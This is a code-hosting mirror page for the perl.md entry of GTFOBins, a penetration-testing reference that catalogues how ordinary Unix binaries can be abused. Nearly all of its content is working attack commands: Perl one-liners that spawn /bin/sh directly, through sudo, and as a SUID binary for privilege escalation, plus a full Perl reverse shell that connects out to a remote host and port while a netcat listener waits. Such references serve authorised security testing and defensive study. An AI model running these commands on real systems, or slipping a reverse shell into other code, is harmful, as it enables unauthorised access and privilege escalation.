This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-13 15:15:11 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
126f779732ae03ba3e0ed6d05e33ff225dcbd584
GTFOBins.github.io
/
_gtfobins
/
perl.md
Emilio Pinna
6a075ebeeb
Add perl reverse-shell description
2018-05-22 19:21:16 +01:00
592 B
Raw
Blame
History
functions
functions
exec-interactive
sudo-enabled
suid-enabled
reverse-shell
code
perl -e 'exec "/bin/sh";'
code
sudo perl -e 'exec "/bin/sh";'
code
./perl -e 'exec "/bin/sh";'
description
code
Run `nc -l -p 8000` to receive the shell on the other end.
export RHOST=10.0.0.1 export RPORT=8000 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Reference in New Issue
View Git Blame
Copy Permalink